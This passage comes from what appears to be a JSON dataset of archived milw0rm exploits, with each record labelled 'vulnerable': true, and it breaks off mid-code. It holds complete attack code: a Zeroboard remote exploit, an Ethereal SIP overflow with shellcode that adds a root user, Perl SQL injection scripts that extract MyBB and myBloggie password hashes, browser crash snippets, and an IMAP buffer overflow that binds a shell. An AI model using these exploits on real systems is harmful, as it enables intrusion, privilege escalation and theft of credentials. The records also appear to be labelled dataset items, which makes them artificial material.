image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\\r\\n\"\n\n\"Referer: http://%s/%s/delete.php?id=%s&page=1&sn1=&divpage=1&sn=off&ss=off&sc=on&select_arrange=headnum&desc=asc&no=%s\\r\\n\"\n\n\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n\n\"Accept-Encoding: gzip, deflate\\r\\n\"\n\n\"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\\r\\n\"\n\n\"Host: %s\\r\\n\"\n\n\"Content-Length: %d\\r\\n\"\n\n\"Connection: close\\r\\n\"\n\n\"Cache-Control: no-cache\\r\\n\"\n\n\"\\r\\n\"\n\n\"%s\", zb_dir, zb_host, zb_dir, zb_tid, no, zb_host, strlen(post_data), post_data);\n\n\n\n\n\nfprintf(stdout, \" [*] Remove your article \");\n\nfflush(stdout);\n\n\n\nif(write(sockfd, WriteBuf, strlen(WriteBuf)) < 0) OutputErr(\"write\", 1);\n\n\n\ntv.tv_sec = 60;\n\ntv.tv_usec = 0;\n\n\n\nFD_ZERO(&fds);\n\n\n\nfor(;;){\n\n\n\nmemset(ReadBuf, 0, sizeof(ReadBuf));\n\n\n\nFD_SET(sockfd, &fds);\n\n\n\nif(select(sockfd+1, &fds, NULL, NULL, &tv) <= 0) OutputErr(\"select\", 1);\n\nif(FD_ISSET(sockfd, &fds)){\n\nif(read(sockfd, ReadBuf, sizeof(ReadBuf)) <= 0) OutputErr(\"read\", 1);\n\n\n\nif(strstr(ReadBuf, \"HTTP/1.1 \")){\n\nif(strstr(ReadBuf+9, \"200 OK\\r\\n\")) { \n\n\n\nif(strstr(ReadBuf+17, \"<meta http-equiv=\\\"refresh\\\" content=\\\"0; url=zboard.php?id=\")) {\n\nfprintf(stdout, \" - ok! :)\\n\");\n\nfflush(stdout);\n\nreturn;\n\n}\n\nelse{ \n\nbreak;\n\n}\n\n}\n\nelse if(strstr(ReadBuf+9, \"404 Not Found\\r\\n\")){\n\nOutputErr(\" - failed!(page not found)\\n\", 0);\n\n}\n\nelse if(strstr(ReadBuf+9, \"400 Bad Request\\r\\n\")){\n\nOutputErr(\" - failed!(Bad Request)\\n\", 0);\n\n}\n\nelse {\n\nfprintf(stderr,\"%s\", ReadBuf);\n\nexit(1);\n\n}\n\n}\n\n\n\n}\n\n}\n\n\n\nfprintf(stderr,\" error!\\n\");\n\n}\n\n\n\nvoid StatusProcess(void)\n\n{\n\nputchar('.');\n\nfflush(stdout);\n\n}\n\n\n\n\n\nvoid OutputErr(char *msg, int type)\n\n{\n\nif(!type){\n\nfprintf(stderr,\"%s\", msg);\n\nfflush(stderr);\n\n}\n\nelse if(type==1){\n\nif(!strcmp(msg, zb_host)) herror(msg);\n\nelse perror(msg);\n\n}\n\n\n\nDeleteArticle();\n\nexit(1);\n\n}\n\n\n\nvoid Usage(char *arg)\n\n{ \n\nfprintf(stderr,\"[*] Zeroboard preg_replace() vulnerability Remote nobody exploit by n0gada\\n\"); \n\nfprintf(stderr,\"--------------------------------------------------------------------------\\n\");\n\nfprintf(stderr,\"Usage: %s <SERVER> [PORT - default : 80] \\n\", arg);\n\nfprintf(stderr,\"--------------------------------------------------------------------------\\n\");\n\n\n\nexit(1);\n\n}\n\n\n\n// milw0rm.com [2005-05-31]",
125        "vulnerable": true
126    },
127    {
128        "exploit_id": 1021,
129        "content": "/* tethereal_sip.c (now quite functional)\n\n*\n\n* Ethereal (0.10.0 to 0.10.10) SIP Dissector remote root exploit\n\n*\n\n* Advisory: \n\n* http://www.ethereal.com/appnotes/enpa-sa-00019.html\n\n* \n\n* produced by Team W00dp3ck3r:\n\n* frauk\\x41iser\n\n* mag00n\n\n* s00n\n\n* thorben\n\n* \n\n* Notes:\n\n* tested on Debian Sarge \n\n* Linux maggot4 2.6.8-1-386 #1 Mon Sep 13 23:29:55 EDT 2004 i686 GNU/Linux\n\n*\n\n* tested version of ethereal:\n\n* http://www.ethereal.com/distribution/all-versions/ethereal-0.10.10.tar.gz\n\n* (./configure, make, make install ;))\n\n* \n\n* victim has to switch from normal user to root using \"su -\" \n\n* the exploit adds a user named \"su\" with password \"su\" on the victim host\n\n* \n\n*/\n\n\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <sys/types.h>\n\n#include <sys/socket.h>\n\n#include <netdb.h>\n\n#include <netinet/in.h>\n\n\n\n\n\nunsigned char sip_header[] = \n\n\"\\x4f\\x50\\x54\\x49\\x4f\\x4e\\x53\\x20\\x73\\x69\\x70\\x3a\\x68\\x61\\x63\"\n\n\"\\x6b\\x20\\x53\\x49\\x50\\x2f\\x32\\x2e\\x30\\x0a\\x56\\x69\\x61\\x3a\\x20\"\n\n\"\\x53\\x49\\x50\\x2f\\x32\\x2e\\x30\\x2f\\x55\\x44\\x50\\x20\\x63\\x70\\x63\"\n\n\"\\x31\\x2d\\x6d\\x61\\x72\\x73\\x31\\x2d\\x33\\x2d\\x30\\x2d\\x63\\x75\\x73\"\n\n\"\\x74\\x32\\x32\\x35\\x2e\\x6d\\x69\\x64\\x64\\x2e\\x63\\x61\\x62\\x6c\\x65\"\n\n\"\\x2e\\x6e\\x74\\x6c\\x2e\\x63\\x6f\\x6d\\x3a\\x35\\x35\\x31\\x31\\x38\\x3b\"\n\n\"\\x72\\x70\\x6f\\x72\\x74\\x0d\\x0a\\x56\\x69\\x61\\x3a\\x20\\x53\\x49\\x50\"\n\n\"\\x2f\\x32\\x2e\\x30\\x2f\\x55\\x44\\x50\\x20\\x68\\x61\\x63\\x6b\\x3a\\x39\"\n\n\"\\x0a\\x46\\x72\\x6f\\x6d\\x3a\\x20\\x73\\x69\\x70\\x3a\\x68\\x61\\x63\\x6b\"\n\n\"\\x3b\\x74\\x61\\x67\\x3d\\x36\\x31\\x35\\x61\\x65\\x37\\x37\\x30\\x0a\\x54\"\n\n\"\\x6f\\x3a\\x20\\x73\\x69\\x70\\x3a\\x68\\x61\\x63\\x6b\";\n\n\n\nunsigned char callid[] =\n\n\"\\x0a\\x43\\x61\\x6c\\x6c\\x2d\\x49\\x44\\x3a\\x20\";\n\n\n\n\n\n/* adduser shellcode, user: \"su\", pwd: \"su\" Full Size=116, splitted into \n\n2 parts because one buffer was too small. thx to http://metasploit.com */\n\nunsigned char shellcode[] =\n\n\"\\x31\\xc9\\x83\\xe9\\xe9\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xa5\"\n\n\"\\xb7\\x95\\xbb\\x83\\xeb\\xfc\\xe2\\xf4\\x94\\x7e\\x1c\\x70\\xcf\\xf1\\xcd\\x76\"\n\n\"\\x25\\xdd\\x90\\xe3\\x94\\x7e\\xc4\\xd3\\xd6\\xc4\\xe2\\xdf\\xcd\\x98\\xba\\xcb\"\n\n\"\\xc4\\xdf\\xba\\xde\\xd1\\xd4\\x1c\\x58\\xe4\\x02\\x91\\x76\\x25\\x24\\x7d\\x9b\"\n\n\"\\xa5\\xb7\\x95\\xc8\\xd0\\x8d\\xd4\\xfa\\xdf\\xf2\\xac\\xd4\\xd4\\xf9\\xdd\\xed\"\n\n\"\\xf5\\x82\\xe6\\x81\\x95\\x8d\\xa5\\x81\\x9f\\x98\\xaf\\x94\\xc7\\xde\\xfb\\x94\"\n\n\"\\xd6\\xdf\\x9f\\xe2\\x2e\\xe6\";\n\n\n\n\n\nunsigned char cseq[] = \n\n\"\\x0a\\x43\\x53\\x65\\x71\\x3a\\x20\";\n\n\n\n/* the malformed cseq method field. the buffer has a size of 16 byte. you need \n\n48 byte to overwrite the return address. the first byte is checked isalpha(), \n\nso we splitted the shellcode in a way that the first char of cseq_method passes\n\nthe isalpha() check. */ \n\nunsigned char cseq_method[] = \n\n\"\\x69\\xd1\\xa1\\xef\\x58\\x3b\\xcf\\xb6\\xcd\\x76\\x25\\xb7\\x95\\xbb\";\n\n\n\n\n\n/* needed to be a fully valid sip packet */\n\nunsigned char sip_footer[] =\n\n\"\\x0a\\x43\\x6f\\x6e\\x74\\x61\\x63\\x74\\x3a\\x20\\x68\\x61\\x63\\x6b\\x3a\"\n\n\"\\x39\\x0a\\x43\\x6f\\x6e\\x74\\x65\\x6e\\x74\\x2d\\x4c\\x65\\x6e\\x67\\x74\"\n\n\"\\x68\\x3a\\x20\\x30\\x0a\\x4d\\x61\\x78\\x2d\\x46\\x6f\\x72\\x77\\x61\\x72\"\n\n\"\\x64\\x73\\x3a\\x20\\x37\\x30\\x0a\\x55\\x73\\x65\\x72\\x2d\\x41\\x67\\x65\"\n\n\"\\x6e\\x74\\x3a\\x20\\x57\\x30\\x30\\x64\\x70\\x33\\x63\\x6b\\x33\\x72\\x20\"\n\n\"\\x0a\";\n\n\n\n\n\n\n\nint main(int argc, char * argv[]) {\n\nunsigned int i, offset, ret, p_addr;\n\nstruct sockaddr_in dest;\n\nstruct hostent *he;\n\nint sock, slen = sizeof(struct sockaddr);\n\nunsigned char buffer[2048];\n\n\n\n// help output\n\nif(argc < 3) {\n\nprintf(\"correct syntax: %s <flag> <host> \\n\", argv[0]);\n\nprintf(\"possible flag: \\n\");\n\nprintf(\"1 the ethereal user has started tethereal\" \n\n\"with full path as root \\n\");\n\nprintf(\"2 the ethereal user has started tethereal\" \n\n\"without directorypath as root \\n\");\n\nreturn 1;\n\n}\n\n\n\n// p_addr may differ on other systems ;)\n\nif (argv[1][0] == '1') {\n\np_addr = 0xbffee328;\n\n}\n\n\n\nif (argv[1][0] == '2') {\n\np_addr = 0xbffee338;\n\n}\n\n\n\n// destination-ip check\n\nif((he = gethostbyname(argv[2])) == NULL) {\n\nprintf(\"[!] Couldn't resolve %s\\n\", argv[2]);\n\nreturn 1;\n\n}\n\n\n\n// open socket\n\nif((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) {\n\nperror(\"socket()\");\n\nreturn 1;\n\n}\n\n\n\n// set packet parameters\n\ndest.sin_port = htons(5060);\n\ndest.sin_family = AF_INET;\n\ndest.sin_addr = *((struct in_addr *)he->h_addr);\n\n\n\n// set the returnaddress (may differ on other systems)\n\nret = 0xbffee240; \n\n\n\n\n\n//// generate a buffer containing the data ////\n\noffset = 0;\n\n\n\n// set all values of the buffer to 0x0\n\nmemset(buffer, 0x0, sizeof(buffer));\n\n\n\n// copy the header into the buffer\n\nmemcpy(buffer+offset, sip_header, sizeof(sip_header)); \n\noffset += sizeof(sip_header) -1;\n\n\n\n// concat the callid into the buffer\n\nmemcpy(buffer+offset, callid, sizeof(callid)); \n\noffset += sizeof(callid) -1;\n\n\n\n// add the callid-value (nop+shellcode)\n\ni = 128 - sizeof(shellcode) +1; \n\nmemset(buffer+offset, 0x90, i);\n\noffset += i;\n\n\n\n// insert shellcode into buffer\n\nmemcpy(buffer+offset, shellcode, sizeof(shellcode));\n\noffset += sizeof(shellcode) -1; \n\n\n\n\n\n// concat the cseq\n\nmemcpy(buffer+offset, cseq, sizeof(cseq)); \n\noffset += sizeof(cseq) -1;\n\n\n\n// generate the part, which causes the overflow (=cseq-method)\n\nmemcpy(buffer+offset, cseq_method, sizeof(cseq_method)); \n\noffset += sizeof(cseq_method) -1; \n\n\n\n// fill the rest of cseq_method with A\n\nmemset(buffer+offset, 0x41, 30);\n\noffset += 30; \n\n// write return address\n\n*(long *)&buffer[offset] = ret; \n\noffset += 4;\n\n\n\n// repair the first pointer after ret- address\n\n*(long *)&buffer[offset] = 0x08215184; // is a pointer DEST-value: 0x1\n\noffset += 4;\n\n// repair second pointer after ret- address \n\n*(long *)&buffer[offset] = p_addr;\n\noffset += 4; \n\n\n\n// the finalising part of the message\n\nmemcpy(buffer+offset, sip_footer, sizeof(sip_footer)); \n\n\n\n// send the buffer to the victim\n\nif (sendto(sock, buffer, sizeof(buffer), 0, \n\n(struct sockaddr *)&dest, slen)== -1) {\n\nprintf(\"[!] Error sending packet!\\n\");\n\nreturn 1;\n\n}\n\n\n\n// DEBUG //\n\n// printf(\"%s\\n\", buffer);\n\n\n\nprintf(\"[*] dark W00dp3ck3r packet sent!\\n\");\n\nclose(sock);\n\nreturn 0;\n\n\n\n}\n\n\n\n// milw0rm.com [2005-05-31]",
130        "vulnerable": true
131    },
132    {
133        "exploit_id": 1022,
134        "content": "#!/usr/bin/perl -w\n\n#\n\n# SQL Injection Exploit for MyBulletinBoard (MyBB) <= 1.00 RC4\n\n# This exploit show the MD5 crypted password of the user id you've chose\n\n# Related advisory: \n\n# Patch: http://www.mybboard.com/community/showthread.php?tid=2559\n\n# http://fain182.badroot.org\n\n# http://www.codebug.org\n\n# Discovered by Alberto Trivero and coded with FAiN182\n\n\n\nuse LWP::Simple;\n\n\n\nprint \"\\n\\t===========================================\\n\";\n\nprint \"\\t= Exploit for MyBulletinBoard <= 1.00 RC4 =\\n\";\n\nprint \"\\t= Alberto Trivero & FAiN182 - codebug.org =\\n\";\n\nprint \"\\t===========================================\\n\\n\";\n\n\n\nif(!$ARGV[0] or !$ARGV[1]) {\n\n   print \"Usage:\\nperl $0 [full_target_path] [user_id]\\n\\nExample:\\nperl $0 http://www.example.com/mybb/ 1\\n\";\n\n   exit(0);\n\n}\n\n\n\n$url = \"calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,null,null,null,password,null%20FROM%20mybb_users%20WHERE%20uid=$ARGV[1]/*\";\n\n$page = get($ARGV[0].$url) || die \"[-] Unable to retrieve: $!\";\n\nprint \"[+] Connected to: $ARGV[0]\\n\";\n\n$page =~ m/<td><strong>(.*?)<\\/strong>/ && print \"[+] User ID is: $1\\n\";\n\nprint \"[-] Unable to retrieve User ID\\n\" if(!$1);\n\n$page =~ m/<a href=\"member\\.php\\?action=profile&uid=\">(.*?)<\\/a>/ && print \"[+] MD5 hash of password is: $1\\n\";\n\nprint \"[-] Unable to retrieve hash of password\\n\" if(!$1);\n\n\n\n# milw0rm.com [2005-05-31]",
135        "vulnerable": true
136    },
137    {
138        "exploit_id": 1023,
139        "content": "#!/usr/bin/perl -w\n\n#\n\n# SQL Injection Exploit for myBloggie 2.1.1 - 2.1.2\n\n# This exploit show the username of the administrator of the blog and his password crypted in MD5\n\n# Related advisories: (Italian) http://www.codebug.org/index.php?subaction=showfull&id=1115310052&archive=&start_from=&ucat=6&\n\n#                     (English) http://www.packetstormsecurity.org/0505-advisories/codebug-9.txt\n\n# Patch: http://mywebland.com/forums/viewtopic.php?t=180\n\n# Coded by Alberto Trivero and Discovered with CorryL\n\n\n\nuse LWP::Simple;\n\n\n\nprint \"\\n\\t=======================================\\n\";\n\nprint \"\\t= Exploit for myBloggie 2.1.1 - 2.1.2 =\\n\";\n\nprint \"\\t=    Alberto Trivero - codebug.org    =\\n\";\n\nprint \"\\t=======================================\\n\\n\";\n\n\n\nif(!$ARGV[0] or !($ARGV[0]=~/http/) or !$ARGV[1] or ($ARGV[1] ne '2.1.1' and $ARGV[1] ne '2.1.2')) {\n\n   print \"Usage:\\nperl $0 [full_target_path] [version: 2.1.1 OR 2.1.2]\\n\\nExample:\\nperl $0 http://www.example.com/mybloggie/ 2.1.1\\n\";\n\n   exit(0);\n\n}\n\n\n\n$url=q[index.php?month_no=1&year=1&mode=viewdate&date_no=1%20UNION%20SELECT%20null,null,null,null,user,password,null,null,null,null%20FROM%20blog_user/*];\n\n$page=get($ARGV[0].$url) || die \"[-] Unable to retrieve: $!\";\n\nprint \"[+] Connected to: $ARGV[0]\\n\";\n\nif($ARGV[1] eq '2.1.1') {\n\n   $page=~m/<tr><td colspan=\"3\" class=\"subject\">(.*?)<\\/td><\\/tr>/ && print \"[+] Username of administrator is: $1\\n\";\n\n   print \"[-] Unable to retrieve username\\n\" if(!$1);\n\n}\n\nelse {\n\n   $page=~m/<img src=\"templates\\/aura\\/images\\/permalink.gif\" border=\"0\" title=\"Permalink\"><\\/a> (.*?)<\\/td><\\/tr>/ && print \"[+] Username of administrator is: $1\\n\";\n\n   print \"[-] Unable to retrieve username\\n\" if(!$1);\n\n}\n\n$page=~m/<tr><td colspan=\"3\" class=\"message\">(.*?)<\\/td><\\/tr>/ && print \"[+] MD5 hash of password is: $1\\n\";\n\nprint \"[-] Unable to retrieve hash of password\\n\" if(!$1);\n\n\n\n\n\n# milw0rm.com [2005-05-31]",
140        "vulnerable": true
141    },
142    {
143        "exploit_id": 1024,
144        "content": "<script>\n\nwindow.onerror=new Function(\"history.go(0)\");\n\nfunction btf(){btf();}\n\nbtf();\n\n</script>\n\n\n\n# milw0rm.com [2005-05-31]",
145        "vulnerable": true
146    },
147    {
148        "exploit_id": 1025,
149        "content": "<body onLoad=\"window()\">\n\n\n\n# milw0rm.com [2005-05-31]",
150        "vulnerable": true
151    },
152    {
153        "exploit_id": 1026,
154        "content": "//**************************************************************************\n\n// e-Post SPA-PRO Mail @Solomon SPA-IMAP4S 4.01 Service Buffer Overflow \n\n// Vulnerability\n\n//\n\n// Bind Shell POC Exploit for Japanese Win2K SP4\n\n// 31 May 2005\n\n//\n\n// This POC code binds shell on port 2001 of a vulnerable e-Post\n\n// SPA-PRO Mail @Solomon IMAP server.\n\n//\n\n// This POC assumes default mailbox configuration C:\\mail\\inbox\\%USERNAME%\n\n// Any changes to the mailbox configuration will cause this POC to\n\n// fail due to the length differences.\n\n//\n\n//\n\n// Advisory \n\n// http://www.security.org.sg/vuln/spa-promail4.html\n\n// http://www.security.org.sg/vuln/spa-promail4-jp.html\n\n//\n\n//**************************************************************************\n\n\n\n#include <stdio.h>\n\n#include <conio.h>\n\n#include <winsock2.h>\n\n#include <windows.h>\n\n#pragma comment (lib,\"ws2_32.lib\")\n\n\n\n\n\nunsigned char expBuf[] = \n\n\"2 create \\\"\"\n\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n\"\\x55\\x8B\\xEC\\x33\\xC9\\x66\\xB9\\xE8\\x03\\x2B\\xE1\\x32\\xC0\\x8B\\xFC\\xF3\"\n\n\"\\xAA\\xB1\\x30\\x64\\x8B\\x01\\x8B\\x40\\x0C\\x8B\\x70\\x1C\\xAD\\x8B\\x70\\x08\"\n\n\"\\xD9\\xEE\\xD9\\x74\\x24\\xF4\\x5F\\x83\\xC7\\x0C\\xEB\\x53\\x60\\x8B\\x6C\\x24\"\n\n\"\\x24\\x8B\\x75\\x3C\\x8B\\x74\\x35\\x78\\x03\\xF5\\x8B\\x7E\\x20\\x03\\xFD\\x8B\"\n\n\"\\x4E\\x18\\x56\\x33\\xDB\\x8B\\x37\\x03\\xF5\\x33\\xC0\\x99\\xAC\\x85\\xC0\\x74\"\n\n\"\\x07\\xC1\\xCA\\x0D\\x03\\xD0\\xEB\\xF4\\x3B\\x54\\x24\\x2C\\x74\\x09\\x83\\xC7\"\n\n\"\\x04\\x43\\xE2\\xE1\\x5E\\xEB\\x16\\x5E\\x8B\\x7E\\x24\\x03\\xFD\\x66\\x8B\\x04\"\n\n\"\\x5F\\x8B\\x7E\\x1C\\x03\\xFD\\x8B\\x04\\x87\\x01\\x44\\x24\\x24\\x61\\xC3\\x89\"\n\n\"\\x75\\xF4\\x68\\x8E\\x4E\\x0E\\xEC\\x56\\xFF\\xD7\\x59\\x33\\xC0\\x66\\xB8\\x6C\"\n\n\"\\x6C\\x50\\x68\\x33\\x32\\x2E\\x64\\x68\\x77\\x73\\x32\\x5F\\x54\\xFF\\xD1\\x8B\"\n\n\"\\xF0\\x68\\xD9\\x09\\xF5\\xAD\\x56\\xFF\\xD7\\x5B\\x83\\xC4\\x20\\x6A\\x01\\x6A\"\n\n\"\\x02\\xFF\\xD3\\x89\\x45\\xD0\\x68\\xA4\\x1A\\x70\\xC7\\x56\\xFF\\xD7\\x5B\\x33\"\n\n\"\\xC0\\x50\\xB8\\xFD\\xFF\\xF8\\x2E\\x83\\xF0\\xFF\\x50\\x8B\\xC4\\x6A\\x10\\x50\"\n\n\"\\xFF\\x75\\xD0\\xFF\\xD3\\x68\\xA4\\xAD\\x2E\\xE9\\x56\\xFF\\xD7\\x5B\\xFF\\x75\"\n\n\"\\xD0\\xFF\\xD3\\x8B\\xCC\\x6A\\x10\\x8B\\xDC\\x68\\x35\\x54\\x8A\\xA1\\x56\\xFF\"\n\n\"\\xD7\\x5A\\x50\\x50\\x53\\x51\\xFF\\x75\\xD0\\xFF\\xD2\\x8B\\xD0\\x68\\xE7\\x79\"\n\n\"\\xC6\\x79\\x56\\xFF\\xD7\\x58\\x89\\x45\\xF0\\x8B\\x75\\xF4\\x83\\xC4\\x20\\xC6\"\n\n\"\\x04\\x24\\x44\\xC6\\x44\\x24\\x2D\\x01\\x89\\x54\\x24\\x38\\x89\\x54\\x24\\x3C\"\n\n\"\\x89\\x54\\x24\\x40\\x8B\\xC4\\x8D\\x58\\x44\\x68\\x72\\xFE\\xB3\\x16\\x56\\xFF\"\n\n\"\\xD7\\x5A\\xB9\\xFF\\x63\\x6D\\x64\\xC1\\xE9\\x08\\x51\\x8B\\xCC\\x53\\x53\\x50\"\n\n\"\\x33\\xC0\\x50\\x50\\x50\\x6A\\x01\\x50\\x50\\x51\\x50\\xFF\\xD2\\x5B\\x68\\xAD\"\n\n\"\\xD9\\x05\\xCE\\x56\\xFF\\xD7\\x58\\x6A\\xFF\\xFF\\x33\\xFF\\xD0\\xFF\\x74\\x24\"\n\n\"\\x48\\xFF\\x55\\xF0\\xFF\\x75\\xD0\\xFF\\x55\\xF0\\x68\\xEF\\xCE\\xE0\\x60\\x56\"\n\n\"\\xFF\\xD7\\x58\\xFF\\xD0\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\xe9\\x4f\\xfe\\xff\\xff\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\n\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x54\\x54\\x54\\x54\"\n\n\"\\x55\\x55\\x55\\x55\\x56\\x56\\x56\\x56\\x57\\x57\\x57\\x57\\xE9\\x0C\\xFE\\xFF\"\n\n\"\\xFF\\xCC\\xEB\\xa0\\x5A\\xD6\\x19\\xF8\\x74\\x41\\x41\\x41\\x42\\x42\\x42\\x42\"\n\n\"\\x43\\x43\\x43\\x43\\x44\\x44\\x44\\x44\\x45\\x45\\x45\\x45\\x46\\x46\\x46\\x46\"\n\n\"\\x47\\x47\\x47\\x47\\x48\\x48\\x48\\x48\\x36\\x49\\x49\\x49\\x4A\\x4A\\x4A\\x4A\"\n\n\"\\x4B\\x4B\\x4B\\x4B\\x4C\\x4C\\x4C\\x4C\\x4D\\x4D\\x4D\\x4D\\x4E\\x4E\\x4E\\x4E\"\n\n\"\\x4F\\x4F\\x4F\\x4F\\x50\\x50\\x50\\x50\\x51\\x51\\x51\\x51\\x52\\x52\\x52\\x52\"\n\n\"\\x53\\x53\\x53\\x53\\x54\\x54\\x54\\x54\\x55\\x55\\x55\\x55\\x56\\x56\\x56\\x56\"\n\n\"\\x57\\x57\\x57\\x57\\x58\\x58\\x58\\x58\\x59\\x59\\x59\\x59\\x5A\\x5A\\x5A\\x5A\"\n\n\"\\\"\\r\\n\";\n\n\n\n\n\nvoid shell(int sockfd)\n\n{\n\n\tchar buffer[1024];\n\n\tfd_set rset;\n\n\tFD_ZERO(&rset);\n\n\n\n\tfor(;;)\n\n\t{\n\n\t\tif(kbhit() != 0)\n\n\t\t{\t\t\n\n\t\t\tfgets(buffer, sizeof(buffer) - 2, stdin);\n\n\t\t\tsend(sockfd, buffer, strlen(buffer), 0);\n\n\t\t}\n\n\n\n\t\tFD_ZERO(&rset);\n\n\t\tFD_SET(sockfd, &rset);\n\n\n\n\t\ttimeval tv;\n\n\t\ttv.tv_sec = 0;\n\n\t\ttv.tv_usec = 50;\n\n\t\t\n\n\t\tif(select(0, &rset, NULL, NULL, &tv) == SOCKET_ERROR)\n\n\t\t{\n\n\t\t\tprintf(\"select error\\n\");\n\n\t\t\tbreak;\n\n\t\t}\n\n        \n\n\t\tif(FD_ISSET(sockfd, &rset))\n\n\t\t{\n\n\t\t\tint n;\n\n\n\n\t\t\tZeroMemory(buffer, sizeof(buffer));\n\n\t\t\tif((n = recv(sockfd, buffer, sizeof(buffer), 0)) <= 0)\n\n\t\t\t{\n\n\t\t\t\tprintf(\"EOF\\n\");\n\n\t\t\t\treturn;\n\n\t\t\t}\n\n\t\t\telse\n\n\t\t\t{\n\n\t\t\t\tfwrite(buffer, 1, n, stdout);\n\n\t\t\t}\n\n\t\t}\n\n\t}\n\n}\n\n\n\n\n\n#define ADDR_POSITION\t\t534\n\n#define RET_ADDR\t\t\t0x74F819D6\t\t// CALL EBX in Japanese Win2K SP4\n\n\n\n// First short jump backwards. (EB AO) \n\n// You should know what to change here, landing onto INT 3 to let debugger kick in.\n\n#define FIRST_BACKJMP_INST\t0x5AA0EBCC\n\n\n\n\n\nint main(int argc, char* argv[])\n\n{\n\n\tWORD wVersionRequested;\n\n\tWSADATA wsaData;\n\n\tstruct sockaddr_in sin;\n\n\tint err;\n\n\tchar inBuffer[10000];\n\n\tchar loginBuf[1000];\n\n\n\n\tif(argc != 4)\n\n\t{\n\n\t\tprintf(\"\\nUsage: %s <imap username> <imap password> <ip addr>\\n\", argv[0]);\n\n\t\treturn 1;\n\n\t}\n\n\n\n\tif(strlen(argv[1]) <= 0 || strlen(argv[1]) > 20)\n\n\t{\n\n\t\tprintf(\"\\nInvalid IMAP username!  Maximum username length is 20.\\n\");\n\n\t\treturn 1;\n\n\t}\n\n\n\n\tif(strlen(argv[2]) <= 0 || strlen(argv[2]) > 14)\n\n\t{\n\n\t\tprintf(\"\\nInvalid IMAP password!  Maximum password length is 14.\\n\");\n\n\t\treturn 1;\n\n\t}\n\n\n\n\tmemset(loginBuf, 0, sizeof(loginBuf));\n\n\t_snprintf(loginBuf, sizeof(loginBuf), \"1 login \\\"%s\\\" \\\"%s\\\"\\r\\n\", argv[1], argv[2]);\n\n\tloginBuf[sizeof(loginBuf)-1] = 0;\n\n\n\n\tint retPos = ADDR_POSITION - (strlen(argv[1]) - 1);\n\n\t\n\n\t*((DWORD *)&expBuf[retPos]) = RET_ADDR;\n\n\t*((DWORD *)&expBuf[retPos-4]) = FIRST_BACKJMP_INST;\n\n\n\n\n\n\twVersionRequested = MAKEWORD(2,0);\n\n\terr = WSAStartup(wVersionRequested, &wsaData);\n\n\tif(err != 0)\n\n\t{\n\n\t\tprintf(\"\\nWSAStartup Error.\\n\");\n\n\t\treturn 1;\n\n\t}\n\n\n\n\tif(LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 0)\n\n\t{\n\n\t\tprintf(\"\\nWinsock Version Error\\n\");\n\n\t\tWSACleanup();\n\n\t\treturn 1;\n\n\t}\n\n\n\n\tSOCKET s = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);\n\n\n\n\tsin.sin_addr.s_addr = inet_addr(argv[3]);\n\n\tsin.sin_family = AF_INET;\n\n\tsin.sin_port = htons(143);\n\n\n\n\tprintf(\"\\n[+] Trying to connect to %s\\n\", inet_ntoa(sin.sin_addr));\n\n\n\n\tif(connect(s, (sockaddr *)&sin, sizeof(sin)) != SOCKET_ERROR)\n\n\t{\n\n\t\tint size;\n\n\t\t\t\n\n\t\t// read IMAP banner\n\n\t\tsize = recv(s, inBuffer, sizeof(inBuffer), 0);\n\n\t\tif(size == SOCKET_ERROR)\n\n\t\t{\n\n\t\t\tprintf(\"[-] Error receiving IMAP banner!\\n\");\n\n\t\t\treturn 1;\n\n\t\t}\n\n\n\n\t\tprintf(\"[+] IMAP banner received!\\n\\n\");\n\n\t\tfwrite(inBuffer, 1, size, stdout);\n\n\t\tprintf(\"\\n\");\n\n\n\n\t\tif(send(s, (char *)loginBuf, strlen((char *)loginBuf), 0) == SOCKET_ERROR)\n\n\t\t{\n\n\t\t\tprintf(\"[-] Error sending login!\\n\");\n\n\t\t\treturn 1;\n\n\t\t}\n\n\n\n\t\tprintf(\"[+] Login Sent.\\n\");\n\n\n\n\t\tsize = recv(s, inBuffer, sizeof(inBuffer), 0);\n\n\t\tif(size == SOCKET_ERROR)\n\n\t\t{\n\n\t\t\tprintf(\"[-] Error receiving login reply!\\n\");\n\n\t\t\treturn 1;\n\n\t\t}\n\n\t\tif(strstr(inBuffer, \"OK\"))\n\n\t\t\tprintf(\"[+] Login successful!\\n\");\n\n\t\telse\n\n\t\t{\n\n\t\t\tprintf(\"[+] Login failed!\\n\");\n\n\t\t\treturn 1;\n\n\t\t}\n\n\n\n\t\tif(send(s, (char *)expBuf, strlen((char *)expBuf), 0) == SOCKET_ERROR)\n\n\t\t{\n\n\t\t\tprintf(\"[-] Error sending exploit!\\n\");\n\n\t\t\treturn 1;\n\n\t\t}\n\n\t\telse\n\n\t\t{\n\n\t\t\tprintf(\"[+] Exploit sent!\\n\");\n\n\t\t}\n\n\n\n\t\tSleep(2000);\n\n\n\n\t\t//================================= Connect to the target ==============================\n\n\t\tSOCKET sock = socket(AF_INET, SOCK_STREAM, 0);\n\n\t\tif(sock == 